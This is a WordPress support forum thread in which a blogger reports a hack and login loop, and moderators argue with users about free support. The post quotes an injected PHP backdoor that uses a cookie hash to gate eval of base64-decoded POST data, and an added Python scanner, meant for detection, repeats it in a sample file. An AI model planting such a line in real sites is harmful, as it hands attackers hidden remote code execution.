• Our blog has been hacked and we are unable to login. When you try to login you get looped back to the login page with no explanation/error message. The Blog is up and running and I can’t see any issues (yet..).
    There were 2 files that were changed index.php and xmlrpc.php and I found this line added to the index file:
    <?php if(md5($_COOKIE['f711587cbed7bdca'])=="1452a323f11b0dd60c49b49f004f077c"){ eval(base64_decode($_POST['file'])); exit; } ?>

    Looking for help…
    Thank you.
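
Added example (not part of the original post, and not WordPress code): a small Python scanner for the two traits of the injected line quoted above, a cookie md5 compared against a hard-coded digest and eval() applied to decoded request input. The rule names, function names and the sample file are constructed for illustration.

```python
import re
from pathlib import Path

# Request-controlled PHP superglobals.
REQUEST = r"\$_(?:POST|GET|COOKIE|REQUEST)\s*\["
RULES = {
    # eval() on request data, optionally wrapped in decoder calls such as base64_decode().
    "eval-of-request-input": re.compile(
        r"\beval\s*\(\s*(?:@?\w+\s*\(\s*)*" + REQUEST, re.I),
    # md5() of a cookie value compared with a hard-coded 32-hex digest.
    "cookie-hash-gate": re.compile(
        r"md5\s*\(\s*\$_COOKIE\s*\[[^\]]*\]\s*\)\s*={2,3}\s*[\"'][0-9a-f]{32}[\"']", re.I),
}

def scan_php_source(text):
    """Return sorted (line_number, rule_name) pairs for each matching line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((lineno, name))
    return sorted(hits)

def scan_tree(root):
    """Scan every *.php file under root; return {path: hits} for files with hits."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample: a stock-looking index.php with the line from the post inserted.
SAMPLE = """<?php
define('WP_USE_THEMES', true);
<?php if(md5($_COOKIE['f711587cbed7bdca'])=="1452a323f11b0dd60c49b49f004f077c"){ eval(base64_decode($_POST['file'])); exit; } ?>
require('./wp-blog-header.php');
$clean = base64_decode($stored_option);
"""

if __name__ == "__main__":
    for lineno, rule in scan_php_source(SAMPLE):
        print(f"line {lineno}: {rule}")
```

A hit from `scan_tree()` on a live install marks a file to compare against a clean copy of the same WordPress release; a clean scan does not prove the tree is unmodified.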

Viewing 15 replies - 1 through 15 (of 20 total)
  • Experienced same problem after upgrading. Clearing my cookies allowed me back into my admin area.

    Thread Starter viewsoj

    (@viewsoj)

    I tried to login after clearing the cookies on both IE and Firefox. Nothing. It also doesn’t explain the changed files and the extra line of code we found in the index.php file..

    Thread Starter viewsoj

    (@viewsoj)

    Tried to reset the login as well and nothing happened. Can’t access the blog.. Anyone have any ideas out there?

    Same thing happened to my site, CultivateGreatness.com

    It is a login loop. I noticed on my ftp, that each file had been downloaded and reuploaded… all dates are Sept 5 2007.

    Very bizarre.

    Whoever is doing this isn’t very thoughtful of others, and needs to find more productive hobbies or find more malicious targets.

    Are you using 2.6.2 and did you set your three custom secret keys (cookie security measures) in wp-config.php?

    I was using 2.6 and haven’t been able to do anything to the site since.

    I did do the upgrade to 2.6.2 but still not able to login.

    Does wordpress even look at the support area?

    I’m amazed at how little support this has received. Maybe it’s time to move my 15 blogs to a new platform, one with support?

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.remarpro.com Admin

    Just because you were hacked does not necessarily mean it’s a WordPress problem. There’s a lot of ways they could get in to your site, and most of them do not involve WordPress.

    Especially if your main index.php was changed, it’s highly unlikely that they got in via WP to do that.

    well, it appears to be a non-isolated incident.

    Many people are having this same problem. Please think outside the box, and don’t write off our support issues so quickly.

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.remarpro.com Admin

    don’t write off our support issues so quickly.

    When you actually POST a real support issue that we’re capable of helping you with, then rest assured, we will do our best.

    However, you have not yet posted one single thing that merits any sort of response at all. You’ve asked no questions, you’ve posted no details, you have not even said what the results of the hack were, or talked about looking at the server logs to find the entry point. You’ve done nothing at all except complain. Inaccurately too.

    If you have a problem, then post a new thread describing the problem. Then, maybe, somebody will be kind enough to help you with this free product which you did not pay anybody anything for. Nobody here owes you anything just because you use their software.

    If you need support immediately, then I suggest you go find somebody to hire who can provide that support. Here, however, volunteers provide support for free. And you get what you pay for, bud.

    As for your 15 blogs, if you’re unable to maintain or operate them without support, then yes, perhaps you should move to another platform.

    The only bad thing about WordPress is the attitude issue people have on this forum.

    yeah, after 3 days of ZERO support… not even a message… then yeah, I’m gonna have a bit of attitude.

    At least a moderator answered this thread finally.

    Obviously, I’m not the only one to have this problem, so it may be a larger issue than you are giving credit.

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.remarpro.com Admin

    What support do you want or expect? You posted nothing worth responding to. You’ve posted zero information. There is nothing of any value in this thread.

    I mean, honestly, WTF are you expecting us to say? “You got hacked? Bummer.” This ain’t no place for sympathy. There’s nothing we can say to this thread because this thread has no answerable questions in it. It has a total lack of any useful information.

    If you get hacked, then I’m sorry, but that’s YOUR problem. It’s your website, so eventually it’s always your problem. There are no currently known vulnerabilities in WordPress, so they probably didn’t hack you through that door.

    And as far as the WordPress forum is concerned, that fact ends the discussion. We can’t help you when there’s nothing to help you with.

    yeah, after 3 days of ZERO support… not even a message… then yeah, I’m gonna have a bit of attitude.

    Did you NOT read what Otto just posted? This is a FREE PRODUCT, no one here HAS TO HELP YOU. You’re not the only one with unanswered posts. Don’t go justifying your attitude by saying you’ve received zero support.

    Especially since no support is implied anywhere.

    I’ve found that if you ask nicely, most of the time, someone helps out. There are some really great developers who DO listen and help here.

    On the other hand, I’ve certainly asked questions that get no answers at all. C’est la vie…

    Most of THOSE times, it’s because I am trying to do something VERY funky!

    the wp-pro list has affordable professional help that I’ve hired before and had great results from… but expect to pay a reasonable amount for their time, it’s worth it in every case I’ve experienced.

    Good luck with it!

  • The topic ‘Login Hacked – Security Issue 2.6’ is closed to new replies.